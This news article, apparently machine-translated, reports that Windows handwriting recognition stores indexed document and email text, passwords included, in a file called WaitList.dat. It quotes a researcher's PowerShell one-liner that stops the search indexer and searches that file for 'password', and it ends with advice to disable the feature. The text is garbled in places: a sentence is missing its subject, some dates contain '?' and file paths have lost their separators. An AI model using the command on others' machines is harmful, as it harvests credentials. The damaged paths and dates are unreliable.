The data of Windows user accounts on a PC with touch input support is collected in a separate file
A large number of notebook models and all-in-one workstations nowadays support touch input. This is done for the user's convenience and speeding up the process of its operation. But, as it turned out, computer systems with activated support for touch-input have one little-known function that jeopardizes the data of users of such systems.
It's about devices running an operating system from Microsoft. The fact is that if the computer with the activated touch-input is controlled by the Windows OS, then the user's data of the system, including logins and passwords, are collected in a separate file, almost in plaintext. This function does not work for all Windows PCs with touch-typing, but only for those of them where handwriting recognition is enabled.
found , that after activation of the handwriting input the file is constantly updated. WaitList.dat is generated by the system immediately after the handwriting recognition option is enabled.
After that, almost any document or email, indexed by Windows Search, is saved in the specified file. It is worth emphasizing that it is not about metadata at all, but about textual information from documents. In order for the information to migrate to this file, the user does not need to open e-mail messages or doc-files. Once they are indexed by the Windows service, everything is automatically stored in the specified location.
Barnaby Skeggs, an information security specialist, who was one of the first to discover the problem in Windows, says , that the file WaitList.dat on his PC keeps "squeezing" text from any text document or e-mail message. And this is true even if the source file is deleted - in WaitList.dat information continues to be stored.
"If the source file is deleted, its indexed data continues to be stored in WaitList.dat", says the expert. This, in theory, gives ample opportunities to malefactors, who for one reason or another have decided to study the data of certain users.
It is worth noting that the problem itself is not a secret. The same Skeggs wrote about it for the first time in 201? and his post received minimal attention of technical specialists. As far as you can understand, technology developers are most concerned about DFIR, and less about network security for a particular user. For the time being, the problem was not widely discussed.
Last month, Skegg came to the conclusion that attackers could (theoretically) steal user data without problems. For example, if the attacker has access to the system being attacked, and he needs the passwords and logins of the user of the compromised PC, then he does not need to search everywhere and everywhere for scraps of logins and passwords, deal with hashes, and so on. - you just need to analyze the WaitList.dat file and get all the necessary data.
Why look for information on the entire disk, especially since many documents can be password-protected? It is enough just to copy the WaitList.dat file and continue to analyze it on its own side.
Stop-Process -name "SearchIndexer" -force; Start-Sleep -m 500; Select-String -Path $ env : USERPROFILEAppDataLocalMicrosoftInputPersonalizationTextHarvesterWaitList.dat -Encoding unicode -Pattern "password"
- Barnaby Skeggs (@barnabyskeggs) August 2? 2018
It is worth noting that the network security expert who discovered the problem did not contact Microsoft. He believes that this is not a "bug, but a feature", that is, the developers of the Windows operating system specially designed the system as it is now. Accordingly, if this is not a vulnerability, the developers are well aware of it and they can solve the problem at any time.
According to Seggs, the default file location is: C: Users% User% AppDataLocalMicrosoftInputPersonalizationTextHarvesterWaitList.dat
If there is no need for Personalized Handwriting Recognition, it's best to turn it off permanently. In this case, indexing files does not save all the data in the specified file without exception.
It may be interesting